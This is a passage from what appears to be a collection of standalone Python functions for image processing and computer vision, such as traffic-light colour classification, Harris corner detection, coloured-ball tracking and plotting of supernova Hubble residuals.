show_image_and_gt(image, objects, fig_num)\n\n red_x, red_y, green_x, green_y = find_tfl_lights(image)\n plt.plot(red_x, red_y, 'ro', color='r', markersize=3)\n plt.plot(green_x, green_y, 'ro', color='g', markersize=3)", "def check_central_star(all_images,x_star0,y_star0,all_titles,all_filt,Dx=100,Dy=50):\n index=0\n \n x_star = []\n y_star = []\n \n for image in all_images:\n x0=int(x_star0[index])\n y0=int(y_star0[index])\n \n old_x0=x0-(x0-Dx)\n old_y0=y0-(y0-Dy)\n \n sub_image=np.copy(image[y0-Dy:y0+Dy,x0-Dx:x0+Dx])\n NX=sub_image.shape[1]\n NY=sub_image.shape[0]\n \n profile_X=np.sum(sub_image,axis=0)\n profile_Y=np.sum(sub_image,axis=1)\n X_=np.arange(NX)\n Y_=np.arange(NY)\n \n profile_X_max=np.max(profile_X)*1.2\n profile_Y_max=np.max(profile_Y)*1.2\n \n avX,sigX=weighted_avg_and_std(X_,profile_X**4) ### better if weight squared\n avY,sigY=weighted_avg_and_std(Y_,profile_Y**4) ### really avoid plateau contribution\n #print index,'\\t',avX,avY,'\\t',sigX,sigY\n \n f, (ax1, ax2,ax3) = plt.subplots(1,3, figsize=(20,4))\n\n ax1.imshow(sub_image,origin='lower',vmin=0,vmax=10000,cmap='rainbow')\n ax1.plot([avX],[avY],'ko')\n ax1.grid(True)\n ax1.set_xlabel('X - pixel')\n ax1.set_ylabel('Y - pixel')\n \n ax2.plot(X_,profile_X,'r-',lw=2)\n ax2.plot([old_x0,old_x0],[0,profile_X_max],'y-',label='old',lw=2)\n ax2.plot([avX,avX],[0,profile_X_max],'b-',label='new',lw=2)\n \n \n ax2.grid(True)\n ax2.set_xlabel('X - pixel')\n ax2.legend(loc=1)\n \n ax3.plot(Y_,profile_Y,'r-',lw=2)\n ax3.plot([old_y0,old_y0],[0,profile_Y_max],'y-',label='old',lw=2)\n ax3.plot([avY,avY],[0,profile_Y_max],'b-',label='new',lw=2)\n \n ax3.grid(True)\n ax3.set_xlabel('Y - pixel')\n ax3.legend(loc=1)\n \n \n thetitle=\"{} : {} , {} \".format(index,all_titles[index],all_filt[index])\n f.suptitle(thetitle, fontsize=16)\n \n theX=x0-Dx+avX\n theY=y0-Dy+avY\n \n x_star.append(theX)\n y_star.append(theY)\n \n \n index+=1\n \n x_star=np.array(x_star)\n y_star=np.array(y_star)\n \n return x_star,y_star", "def histo_image(image, verbose=False):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n histo_global = cv2.equalizeHist(gray)\n\n _, histo = cv2.threshold(histo_global, thresh=250,\n maxval=255, type=cv2.THRESH_BINARY)\n\n if verbose:\n plt.imshow(histo, cmap='gray')\n plt.show()\n\n return histo", "def plot_HDres_histos_vs_z(\n df,\n nameout,\n threshold_var=\"class0\",\n threshold_list=[0.5, 0.7, 0.9],\n threshold_sign=\">\",\n):\n\n P = df[df[\"class0\"] > 0.5]\n Ias = df[df[\"target\"] == 0]\n\n TP = P[P[\"target\"] == 0]\n FP = P[P[\"target\"] != 0]\n\n sel_TP_dic = {}\n sel_FP_dic = {}\n for t in threshold_list:\n if threshold_sign == \">\":\n sel_TP_dic[t] = TP[TP[threshold_var] > t]\n sel_FP_dic[t] = FP[FP[threshold_var] > t]\n else:\n sel_TP_dic[t] = TP[TP[threshold_var] < t]\n sel_FP_dic[t] = FP[FP[threshold_var] < t]\n\n plt.clf()\n cm = CMAP\n fig = plt.figure(figsize=(14, 14))\n # gs = gridspec.GridSpec(4, 2, width_ratios=[3, 1], height_ratios=[2, 2, 1, 1])\n # gs.update(wspace=0.1, hspace=0.3)\n\n # # gridspec init\n # ax00 = plt.subplot(gs[0, 0]) # Hres Ia\n # ax10 = plt.subplot(gs[1, 0], sharex=ax00) # Hres CC\n # ax20 = plt.subplot(gs[2:, 0], sharex=ax00) # efficiency\n # ax01 = plt.subplot(gs[0, 1], sharey=ax00) # histo Ia\n # ax11 = plt.subplot(gs[1, 1], sharey=ax10) # histo CC\n # ax21 = plt.subplot(gs[2, 1]) # histo x1\n # ax31 = plt.subplot(gs[3, 1]) # histo c\n gs = gridspec.GridSpec(3, 3, height_ratios=[2, 2, 1])\n # gs.update(wspace=0.2, hspace=0.1)\n\n # gridspec init\n ax00 = plt.subplot(gs[0, 0:2]) # Hres Ia\n ax10 = plt.subplot(gs[1, 0:2], sharex=ax00) # Hres CC\n ax20 = plt.subplot(gs[2, 0]) # redshift dist\n ax01 = plt.subplot(gs[0, 2], sharey=ax00) # histo Ia\n ax11 = plt.subplot(gs[1, 2], sharey=ax10) # histo CC\n ax21 = plt.subplot(gs[2, 1]) # histo x1\n ax31 = plt.subplot(gs[2, 2]) # histo c\n\n # lines\n ax00.plot([0, 1.2], np.zeros(len([0, 1.2])), \"k:\")\n ax10.plot([0, 1.2], np.zeros(len([0, 1.2])), \"k:\")\n\n mubins = np.arange(-2, 2 + 0.1, 0.1)\n\n # Hres w. histogram\n def HRwhisto(\n df, sel_dic, ax_left, ax_right, threshold_sign, ylabel=\"TP\", visible=False\n ):\n if ylabel == \"TP\":\n sntyp = \"Ia\"\n else:\n sntyp = \"CC\"\n ax_left.scatter(\n df[\"SIM_REDSHIFT_CMB\"],\n df[\"delmu\"],\n c=df[\"class0\"],\n cmap=CMAP,\n vmin=0.5,\n vmax=1,\n s=8,\n )\n ax_left.errorbar(\n df[\"SIM_REDSHIFT_CMB\"],\n df[\"delmu\"],\n yerr=df[\"delmu_err\"],\n color=\"gray\",\n zorder=0,\n fmt=\"none\",\n marker=\"none\",\n )\n\n ax_left.set_ylim(-2, 2)\n ax_left.set_xlim(0, 1.2)\n ax_left.set_ylabel(f\"{ylabel} residual\", fontsize=18)\n ax_left.tick_params(labelsize=14)\n plt.setp(ax_left.get_xticklabels(), visible=visible)\n if visible is True:\n ax_left.set_xlabel(\"simulated redshift\", fontsize=18)\n for t in threshold_list:\n sel = sel_dic[t]\n n_SNe = len(sel)\n ax_right.hist(\n sel[\"delmu\"],\n orientation=\"horizontal\",\n histtype=\"step\",\n color=cm(t),\n bins=mubins,\n density=True,\n label=f\"{n_SNe} {sntyp} {threshold_sign} {t}\",\n lw=2,\n )\n ax_right.legend(loc=\"lower center\", prop={\"size\": 13})\n plt.setp(ax_right.get_yticklabels(), visible=False)\n plt.setp(ax_right.get_xticklabels(), visible=False)\n ax_right.plot(\n [ax_right.get_xlim()[0], ax_right.get_xlim()[1]],\n np.zeros(len([ax_right.get_xlim()[0], ax_right.get_xlim()[1]])),\n \"k:\",\n )\n\n HRwhisto(TP, sel_TP_dic, ax00, ax01, threshold_sign, ylabel=\"TP\", visible=False)\n HRwhisto(FP, sel_FP_dic, ax10, ax11, threshold_sign, ylabel=\"FP\", visible=True)\n\n # z histos\n n, bins_to_use, tmp = ax20.hist(\n Ias[\"SIM_REDSHIFT_CMB\"], histtype=\"step\", color=\"black\", bins=15, lw=3\n )\n\n for t in threshold_list:\n sel_TP = sel_TP_dic[t]\n sel_FP = sel_FP_dic[t]\n ax20.hist(\n sel_TP[\"SIM_REDSHIFT_CMB\"], histtype=\"step\", color=cm(t), bins=bins_to_use\n )\n ax20.hist(\n sel_FP[\"SIM_REDSHIFT_CMB\"],\n histtype=\"step\",\n color=cm(t),\n linestyle=\"--\",\n bins=bins_to_use,\n )\n ax20.set_xlim(0, 1.2)\n ax20.tick_params(labelsize=14)\n ax20.set_xlabel(\"simulated redshift\", fontsize=18)\n\n # hist stretch\n n, bins_to_use, tmp = ax21.hist(Ias[\"x1\"], color=\"black\", histtype=\"step\", lw=3)\n for t in threshold_list:\n sel_TP = sel_TP_dic[t]\n ax21.hist(\n sel_TP[\"x1\"],\n orientation=\"vertical\",\n histtype=\"step\",\n color=cm(t),\n bins=bins_to_use,\n lw=2,\n )\n ax21.set_xlabel(\"x1\", fontsize=18)\n ax21.yaxis.set_label_position(\"right\")\n ax21.set_xlim(-3, 3)\n ax21.tick_params(labelsize=14)\n # color histo\n n, bins_to_use, tmp = ax31.hist(Ias[\"c\"], color=\"black\", histtype=\"step\", lw=3)\n for t in threshold_list:\n sel_TP = sel_TP_dic[t]\n ax31.hist(\n sel_TP[\"c\"],\n orientation=\"vertical\",\n histtype=\"step\",\n color=cm(t),\n bins=bins_to_use,\n lw=2,\n )\n ax31.set_xlabel(\"c\", fontsize=18)\n ax31.set_xlim(-1, 1)\n ax31.tick_params(labelsize=14)\n ax31.yaxis.set_label_position(\"right\")\n\n gs.tight_layout(fig)\n plt.savefig(nameout)\n plt.close()\n del fig", "def get_classification(self, image):\n hsv_image = cv2.cvtColor(image,cv2.COLOR_BGR2HSV)\n red_low = np.array([0, 100, 100],np.uint8)\n red_high = np.array([10, 255, 255],np.uint8) \n red1_low = np.array([160, 100, 100],np.uint8)\n red1_high = np.array([179, 255, 255],np.uint8)\n \n if cv2.countNonZero(cv2.inRange(hsv_image,red_low,red_high))+cv2.countNonZero(cv2.inRange(hsv_image,red1_low,red1_high))>45:\n return TrafficLight.RED\n \n yel_low = np.array([28, 100, 100],np.uint8)\n yel_high = np.array([48, 255, 255],np.uint8)\n if cv2.countNonZero(cv2.inRange(hsv_image, yel_low, yel_high)) > 45:\n return TrafficLight.YELLOW\n \n gr_low = np.array([64, 100, 100],np.uint8)\n gr_high = np.array([100, 255, 255],np.uint8)\n if cv2.countNonZero(cv2.inRange(hsv_image, gr_low, gr_high)) > 45:\n return TrafficLight.GREEN\n \n return TrafficLight.UNKNOWN", "def detect(self, img: np.ndarray) -> np.ndarray:\n filtered = self.filter(img)\n\n # Detect edges\n edges = cv2.Canny(np.uint8(filtered * 255), self.canny_lo, self.canny_hi)\n\n # Obtain the gradients for filtering.\n # We only require local gradients, so obtaining them only when required would make sense.\n dx = cv2.Scharr(filtered, cv2.CV_32F, 1, 0)\n dy = cv2.Scharr(filtered, cv2.CV_32F, 0, 1)\n\n # Now the stroke width transform already detects lo-hi-lo edges for us, but it is an extremely slow\n # implementation I did.\n if self._stroke_filter:\n gradients = (dx, dy)\n for y in range(0, edges.shape[0]):\n for x in range(0, edges.shape[1]):\n if edges[y, x] == 0:\n continue\n ray = swt_process_pixel((x, y), edges, gradients, min_length=5, max_length=20)\n if ray is None:\n edges[y, x] = 0\n else:\n edges = non_line_suppression(filtered, edges, dx, dy)\n\n if self._morphological_filtering:\n edges = cv2.morphologyEx(edges, cv2.MORPH_BLACKHAT, np.ones(shape=(5, 5)))\n edges = cv2.medianBlur(edges, 3)\n\n if self.detect_lines:\n lines = cv2.HoughLinesP(edges, 1, np.pi / 90, self.hough_line_support,\n minLineLength=self.hough_line_length, maxLineGap=self.hough_line_gap)\n edge_lines = np.zeros_like(edges)\n if lines is None:\n return edge_lines\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(edge_lines, (x1, y1), (x2, y2), 255, 2)\n else:\n edge_lines = edges\n\n return edge_lines", "def harris_corner_detector(img, image_name):\n x_len = img.shape[0]\n y_len = img.shape[1]\n\n horizontal_sobel_filter = np.array([[1, 2, 1],\n [0, 0, 0],\n [-1, -2, -1]])\n\n vertical_sobel_filter = np.array([[-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]])\n\n # Compute edge strength of pixels in image\n gx = MyConvolve(img, horizontal_sobel_filter) \n gy = MyConvolve(img, vertical_sobel_filter)\n\n # Compute product of derivatives\n I_xx = gx * gx\n I_xy = gx * gy\n I_yy = gy * gy\n\n # Define Gaussian kernel\n kernel = gauss_kernels(3)\n \n # Convolve product of derivatives (I_xx, I_xy, I_yy)\n W_xx = MyConvolve(I_xx, kernel)\n W_xy = MyConvolve(I_xy, kernel)\n W_yy = MyConvolve(I_yy, kernel)\n\n # Initialise response matrix\n response = np.zeros(img.shape)\n\n # Compute response for pixels that will be taken into consideration\n for x in range(1, x_len - 1):\n for y in range(1, y_len - 1):\n w = np.array([[W_xx[x, y], W_xy[x, y]],\n [W_xy[x, y], W_yy[x, y]]])\n det_W = np.linalg.det(w)\n trace_W = np.trace(w)\n response[x, y] = det_W - 0.06 * trace_W * trace_W\n\n # Get max response from response matrix \n max_r = np.max(response) \n\n # Initialise lists for x, y coordinates\n x_list = []\n y_list = []\n\n # Select response values within 10% of maximum response\n for x in range(1, x_len - 1):\n for y in range(1, y_len - 1):\n if response[x, y] >= (max_r * 0.1) and response[x, y] <= (max_r * 1.9):\n x_list.append(x)\n y_list.append(y)\n\n # Plot selected response values on image\n plt.figure()\n plt.imshow(img, cmap='gray')\n plt.scatter(y_list, x_list, edgecolors='blue', facecolors='none', s=81, marker='s')\n plt.savefig(image_name + '_corners.jpg')", "def explore_data():\n labels = [\"vehicles\", \"non-vehicles\"]\n labelmap = {0: \"vehicles\", 1: \"non-vehicles\"}\n vehicles_glob = os.path.join(data_dir, \"vehicles\", \"**\", \"*.png\")\n nonvehicles_glob = os.path.join(data_dir, \"non-vehicles\", \"**\", \"*.png\")\n class_fnames = [\n glob.glob(vehicles_glob, recursive = True),\n glob.glob(nonvehicles_glob, recursive = True)]\n n_samples = [len(fnames) for fnames in class_fnames]\n shapes = []\n samples = []\n print(table_format([\"label\", \"size\", \"shape\"], header = True))\n for label, fnames in enumerate(class_fnames):\n indices = np.random.choice(len(fnames), 4*10, replace = False)\n for i in indices:\n fname = fnames[i]\n img = cv2.imread(fname)\n samples.append(img)\n shape = img.shape\n shapes.append(shape)\n print(table_format([labels[label], n_samples[label], shapes[label]]))\n\n samples = np.stack(samples)\n samples = tile(samples, 2*4, 10)\n cv2.imwrite(os.path.join(out_dir, \"datasamples.png\"), samples)\n\n return class_fnames, labelmap", "def cartoonise(picture_name):\n raw_img = picture_name\n out_img = './result/silhouetters_0.jpg'\n num_down = 2 # Reduce the number of pixel samples\n num_bilateral = 7 # Define the number of bilateral filters\n img_rgb = cv2.imread(raw_img) # read img\n # Lower sampling with gaussian pyramid\n img_color = img_rgb\n for _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\n # Replace a large filter with a small bilateral filter\n for _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(\n img_color, d=9, sigmaColor=9, sigmaSpace=7)\n # Lift sampled image to original size\n for _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\n # Convert to grayscale and give it a medium blur\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)\n img_blur = cv2.medianBlur(img_gray, 7)\n # Detect edges and enhance them\n img_edge = cv2.adaptiveThreshold(img_blur, 255,\n cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY,\n blockSize=9,\n C=2)\n # Convert back to color image\n img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\n img_cartoon = cv2.bitwise_and(img_color, img_edge)\n # Save the converted image\n cv2.imwrite(out_img, img_cartoon)", "def scan_images(images, clf, first_index, vstep=15, hstep=15, dnum=5):\n detections = []\n for i in tqdm(range(len(images))):\n labels = find_faces(util.img_as_float(rgb2gray(images[i])), clf, first_index + i,\n vstep, hstep, dnum)\n for label in labels:\n detections.append(label)\n return np.array(detections)", "def locate_tracker(self, debug):\n\n # tmp_image =\n # tmp_image = cv2.GaussianBlur(self.frame, (11, 11), 0) # Experiment with this\n\n hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV) # Convert to HSV Color Space. This is temporary for testing using colored objects)\n\n mask = cv2.inRange(hsv, self.hueLower, self.hueUpper)\n\n try:\n mask = cv2.inRange(hsv, self.hueLower2, self.hueUpper2) + mask\n except AttributeError:\n pass\n\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n if debug:\n tmpMask = imutils.resize(mask, width=1000, height=1000)\n cv2.imshow(\"mask\", tmpMask)\n\n\n # find contours in the mask and initialize the current (x, y) center of the object\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n\n # only proceed if at least one contour was found\n if len(cnts) > 0:\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and\n # centroid\n c = max(cnts, key=cv2.contourArea)\n\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n # only proceed if the radius meets a minimum size\n # if radius > 10:\n # # draw the circle and centroid on the frame,\n # # then update the list of tracked points\n # cv2.circle(frame, (int(x), int(y)), int(radius),\n # (0, 255, 255), 2)\n # cv2.circle(frame, center, 5, (0, 0, 255), -1)\n if debug:\n cv2.drawContours(self.frame, c, -1, (0, 255, 0), 20)\n return center, radius\n # update the points queue\n cv2.imshow(\"mask\", imutils.resize(mask, width=1000, height=1000))\n cv2.imshow(\"frame\", imutils.resize(self.frame, width=1000, height=1000))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n raise OpenCVError(\"Could not find tracker!\")\n\n # return (1, 1), 1", "def belt(image):\n\n # Belt Detector\n x, y = circular_detector(image, 70, 80)\n\n return x, y", "def filter_images(self, images):\n status = self.day_or_night(images[0][1],\n self.gray_refs['day'][0],\n self.gray_refs['night'][0])\n print status\n exclusions = self.gray_refs[status]\n threshold = 0.7\n last_ref = None\n result = []\n\n for filename, gray_img, raw_img in images:\n skip = False\n if last_ref:\n dist = ssim(gray_img, exclusions[last_ref], multichannel=False)\n if dist > threshold:\n skip = True\n\n if not skip:\n for i, gray_ref in enumerate(exclusions):\n if i == last_ref:\n continue\n dist = ssim(gray_img, gray_ref, multichannel=False)\n if dist > threshold:\n skip = True\n last_ref = i\n break\n\n if not skip:\n if (time.time() - self.last_notify) > notify_thresh:\n send_alert('Alert! Motion detected near front door.')\n self.last_notify = time.time()\n result.append((filename, gray_img, raw_img))\n return result", "def detectState(self, colorImage):\n\n self.image = colorImage;\n self.video = Video()\n\n # find the intersections of the hough lines\n self.intersects = self._findIntersects()\n\n # Use previoulsy acquired data to create a board, that is, a dictionary of cells [Cell Class]\n self._divideInCells()\n\n return self.board, self.image", "def detect_and_draw_as_marker(self, image):\r\n # Required variables\r\n count = 0\r\n # convert to HSV.. so that we can filter out the image from our captured HSV values for our markers previously..\r\n HSVimg = cv2.cvtColor(src=image, code=cv2.COLOR_BGR2HSV)\r\n # loop through all marker's HSV values\r\n for marker_HSV in self.markers_HSV:\r\n lower_boundary = np.array(marker_HSV[0])\r\n upper_boundary = np.array(marker_HSV[1])\r\n # Get the mask image that satisfies the lower and upper HSV values..\r\n maskImg = cv2.inRange(src=HSVimg, lowerb=lower_boundary, upperb=upper_boundary)\r\n\r\n '''Draw the contours for the mask image detected, marker point for the marker'''\r\n # Get the bounding box corners (In the function call to self.draw_contours(), contours are drawn to original camera feed, if self.debug_mode is set to 1)\r\n x, y, width, height = self.draw_contours(image, maskImg)\r\n if self.debug_mode:\r\n cv2.rectangle(img=image, pt1=(x, y), pt2=(x + width, y + height), color=(255, 0, 255), thickness=3)\r\n # Select the marker point..\r\n marker_point_center = (x + width // 2, y)\r\n # Draw the marker point..\r\n # cv2.circle(img=image, center=marker_point_center, radius=5, color=(2, 255, 10), thickness=cv2.FILLED)\r\n cv2.circle(img=image, center=marker_point_center, radius=5, color=list(self.marker_colors[count]), thickness=cv2.FILLED)\r\n\r\n # Append the trace point of marker..\r\n self.marker_path_points.append([marker_point_center, count])\r\n #print(count, end=\"\\n\")\r\n count += 1", "def detect(frame: numpy.ndarray) -> bool:\n color = frame[:20, 1100:1150].mean(axis=(0, 1))\n return numpy.linalg.norm(color - BG_COLOR) < 5", "def get_centers(file_path = \"./data/input.jpeg\", n_rows=10, n_cols=10, verbose=False, image_thresh=20, hough_thresh=20, minDist=20, maxRadius=20):\n print(\"looking for circles in the image\")\n cimg = cv2.imread(file_path, 1)\n gimg = cv2.cvtColor(cimg, cv2.COLOR_BGR2GRAY)\n gimg = cv2.medianBlur(gimg, 5)\n # threshold the image for better circle finding\n _, gimg = cv2.threshold(gimg, image_thresh, 255, cv2.THRESH_BINARY)\n\n\n # find circles on the image\n circles = cv2.HoughCircles(gimg, cv2.HOUGH_GRADIENT, dp=1, minDist=minDist, param1=1, param2=hough_thresh, minRadius=5,\n maxRadius=maxRadius)\n\n # re-sequence the circles found\n circles = circles[0, :, :].reshape((-1, 3))\n x_min = circles.min(axis=0)[0]\n x_max = circles.max(axis=0)[0]\n avg_spacing = (x_max - x_min) / (n_cols - 1)\n x_segment = [x_min - avg_spacing / 2 + avg_spacing * i for i in range(11)]\n def get_col_id(point):\n # return which col this point sits\n x = point[0]\n for i in range(n_cols):\n if x_segment[i] < x < x_segment[i + 1]:\n return i\n cols = [[] for i in range(n_cols)]\n for circle in circles:\n id = get_col_id(circle)\n cols[get_col_id(circle)].append(circle)\n for i, col in enumerate(cols):\n cols[i] = list(sorted(col, key=lambda p:p[1]))\n grid = np.zeros((n_rows, n_cols, 3))\n for c in range(n_cols):\n for r in range(n_rows):\n grid[r, c, :] = cols[c][r]\n\n # plot theses circles to make sure the sequence is correct\n gaussian_img = cv2.GaussianBlur(cv2.cvtColor(cimg, cv2.COLOR_BGR2GRAY), (5, 5), 0)\n for c in range(10):\n for r in range(10):\n pos = grid[r, c, :2].astype(np.int)\n radius = grid[r, c, 2].astype(np.int)\n # draw the outer circle\n cv2.circle(cimg, (pos[0], pos[1]), radius, (0, 255, 0), 2)\n # draw the center of the circle\n cv2.circle(cimg, (pos[0], pos[1]), 2, (0, 0, 255), 3)\n # find the avg intensity at each center\n grid[r, c, 2] = gaussian_img[pos[1], pos[0]]\n if verbose:\n cv2.imshow('circles found in the image', cimg)\n cv2.waitKey(10)\n\n if verbose:\n cv2.imshow('circles found in the image', cimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return grid", "def guess_image(which_cam, image, ntraps):\n threshes = [0.5, 0.65]\n ## Image Conditioning ##\n margin = 10\n threshold = np.max(image)*threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif p < threshold and left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n xdata = np.arange(x_len)\n plt.figure()\n plt.plot(xdata, peak_vals)\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)", "def detectBall():\n\t\n\tglobal np_arr\n\timage_np = cv2.imdecode(np_arr, cv2.IMREAD_COLOR) # OpenCV >= 3.0:\n\n\tblackLower = (0, 0, 0) \n\tblackUpper = (5,50,50)\n\tredLower = (0, 50, 50)\n\tredUpper = (5, 255, 255)\n\tyellowLower = (25, 50, 50) \n\tyellowUpper = (35, 255, 255)\n\tgreenLower = (50, 50, 50) \n\tgreenUpper = (70, 255, 255)\n\tblueLower = (100, 50, 50) \n\tblueUpper = (130, 255, 255)\n\tmagentaLower = (125, 50, 50) \n\tmagentaUpper = (150, 255, 255)\n\n blurred = cv2.GaussianBlur(image_np, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n\tmask_blk = cv2.inRange(hsv, blackLower, blackUpper)\n mask_blk = cv2.erode(mask_blk, None, iterations=2)\n mask_blk = cv2.dilate(mask_blk, None, iterations=2)\n\n\tmask_r = cv2.inRange(hsv, redLower, redUpper)\n mask_r = cv2.erode(mask_r, None, iterations=2)\n mask_r = cv2.dilate(mask_r, None, iterations=2)\n\n\tmask_y = cv2.inRange(hsv, yellowLower, yellowUpper)\n mask_y = cv2.erode(mask_y, None, iterations=2)\n mask_y = cv2.dilate(mask_y, None, iterations=2)\n\n\tmask_g = cv2.inRange(hsv, greenLower, greenUpper)\n mask_g = cv2.erode(mask_g, None, iterations=2)\n mask_g = cv2.dilate(mask_g, None, iterations=2)\n\n mask_blu = cv2.inRange(hsv, blueLower, blueUpper)\n mask_blu = cv2.erode(mask_blu, None, iterations=2)\n mask_blu = cv2.dilate(mask_blu, None, iterations=2)\n\n\tmask_m = cv2.inRange(hsv, magentaLower, magentaUpper)\n mask_m = cv2.erode(mask_m, None, iterations=2)\n mask_m = cv2.dilate(mask_m, None, iterations=2)\n #cv2.imshow('mask', mask)\n\n cnts_blk = cv2.findContours(mask_blk.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_r = cv2.findContours(mask_r.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_y = cv2.findContours(mask_y.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_g = cv2.findContours(mask_g.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_blu = cv2.findContours(mask_blu.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_m = cv2.findContours(mask_m.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\n cnts_blk = imutils.grab_contours(cnts_blk)\n\tcnts_r = imutils.grab_contours(cnts_r)\n\tcnts_y = imutils.grab_contours(cnts_y)\n\tcnts_g = imutils.grab_contours(cnts_g)\n\tcnts_blu = imutils.grab_contours(cnts_blu)\n\tcnts_m = imutils.grab_contours(cnts_m)\n\n center = None\n\tc = 0\n\tradius = 0\n\n\tglobal black_ball, red_ball, yellow_ball, green_ball, blue_ball, magenta_ball\n\n # only proceed if at least one contour was found\n if len(cnts_blk) > 0 and black_ball.detected_flag != True:\n c = max(cnts_blk, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t black_ball = track(radius, center, black_ball)\n\t pub_blackBall.publish(black_ball)\n\t print (\"Black ball detected.\\n\")\n\n\telif len(cnts_r) > 0 and red_ball.detected_flag != True:\n c = max(cnts_r, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t red_ball = track(radius, center, red_ball)\n\t pub_redBall.publish(red_ball)\n\t print (\"Red ball detected.\\n\")\n\t \n\telif len(cnts_y) > 0 and yellow_ball.detected_flag != True:\n c = max(cnts_y, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t yellow_ball = track(radius, center, yellow_ball)\n\t pub_yellowBall.publish(yellow_ball)\n\t print (\"Yellow ball detected.\\n\")\n\n\telif len(cnts_g) > 0 and green_ball.detected_flag != True:\n c = max(cnts_g, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t green_ball = track(radius, center, green_ball)\n\t pub_greenBall.publish(green_ball)\n\t print (\"Green ball detected.\\n\")\n\n\telif len(cnts_blu) > 0 and blue_ball.detected_flag != True:\n c = max(cnts_blu, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t blue_ball = track(radius, center, blue_ball)\n\t pub_blueBall.publish(blue_ball)\n\t print (\"Blue ball detected.\\n\")\n\n\telif len(cnts_m) > 0 and magenta_ball.detected_flag != True:\n c = max(cnts_m, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t magenta_ball = track(radius, center, magenta_ball)\n\t 